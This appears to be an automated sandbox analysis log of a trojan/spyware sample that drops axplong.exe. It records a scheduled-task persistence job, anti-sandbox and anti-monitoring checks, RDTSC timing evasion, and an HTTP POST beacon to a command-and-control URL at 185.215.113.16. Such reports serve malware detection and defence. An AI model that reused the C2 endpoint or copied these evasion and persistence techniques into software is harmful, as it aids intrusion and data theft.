                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006DBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,8_2_006DBD60
                    Source: unknownHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.1
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php15.113.16
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php5.185
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php6
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=.
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpD)=::
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE(
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS)y8
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpS.
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpX
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpe$
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phphp
                    Source: axplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk
                    Source: axplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpo
                    Source: axplong.exe, 00000008.00000002.3426692930.00000000010CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpr
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu%
                    Source: axplong.exe, 00000008.00000002.3426692930.00000000010EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=
                    Source: axplong.exe, 00000008.00000002.3426692930.0000000001110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: .idata
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_007130688_2_00713068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006DE4408_2_006DE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006D4CF08_2_006D4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00707D838_2_00707D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0071765B8_2_0071765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006D4AF08_2_006D4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_0071777B8_2_0071777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_007187208_2_00718720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00716F098_2_00716F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_00712BD08_2_00712BD0
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9975359758174387
                    Source: file.exeStatic PE information: Section: amswznhi ZLIB complexity 0.9942809871941896
                    Source: axplong.exe.1.drStatic PE information: Section: ZLIB complexity 0.9975359758174387
                    Source: axplong.exe.1.drStatic PE information: Section: amswznhi ZLIB complexity 0.9942809871941896
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 50%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: file.exeStatic file information: File size 1877504 > 1048576
                    Source: file.exeStatic PE information: Raw size of amswznhi is bigger than: 0x100000 < 0x198c00

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 8.2.axplong.exe.6d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;amswznhi:EW;zlhbfepu:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: axplong.exe.1.drStatic PE information: real checksum: 0x1d4762 should be: 0x1d96e0
                    Source: file.exeStatic PE information: real checksum: 0x1d4762 should be: 0x1d96e0
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: amswznhi
                    Source: file.exeStatic PE information: section name: zlhbfepu
                    Source: file.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: .idata
                    Source: axplong.exe.1.drStatic PE information: section name:
                    Source: axplong.exe.1.drStatic PE information: section name: amswznhi
                    Source: axplong.exe.1.drStatic PE information: section name: zlhbfepu
                    Source: axplong.exe.1.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 8_2_006ED84C push ecx; ret 8_2_006ED85F
                    Source: file.exeStatic PE information: section name: entropy: 7.98822985623302
                    Source: file.exeStatic PE information: section name: amswznhi entropy: 7.951896268933144
                    Source: axplong.exe.1.drStatic PE information: section name: entropy: 7.98822985623302
                    Source: axplong.exe.1.drStatic PE information: section name: amswznhi entropy: 7.951896268933144
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A039ED second address: A039F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F1B751F19D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A039F9 second address: A039FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A039FD second address: A03A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F1B751F19D8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03A11 second address: A03A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03A28 second address: A03A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03A2C second address: A03A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03D27 second address: A03D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03D2B second address: A03D4F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1B74BBC1DBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03D4F second address: A03D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1B751F19D6h 0x0000000a ja 00007F1B751F19D6h 0x00000010 jl 00007F1B751F19D6h 0x00000016 popad 0x00000017 jmp 00007F1B751F19DFh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04052 second address: A0405C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A070D1 second address: A070E7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1B751F19D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F1B751F19D6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07263 second address: A07267 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07267 second address: A07270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07324 second address: A07328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A073FD second address: A07401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07401 second address: A07405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07405 second address: A0746F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a mov dword ptr [ebp+122D1CEEh], edx 0x00000010 call 00007F1B751F19D9h 0x00000015 jp 00007F1B751F19DEh 0x0000001b push eax 0x0000001c pushad 0x0000001d push edi 0x0000001e jne 00007F1B751F19D6h 0x00000024 pop edi 0x00000025 jbe 00007F1B751F19EDh 0x0000002b popad 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F1B751F19E2h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0746F second address: A07474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
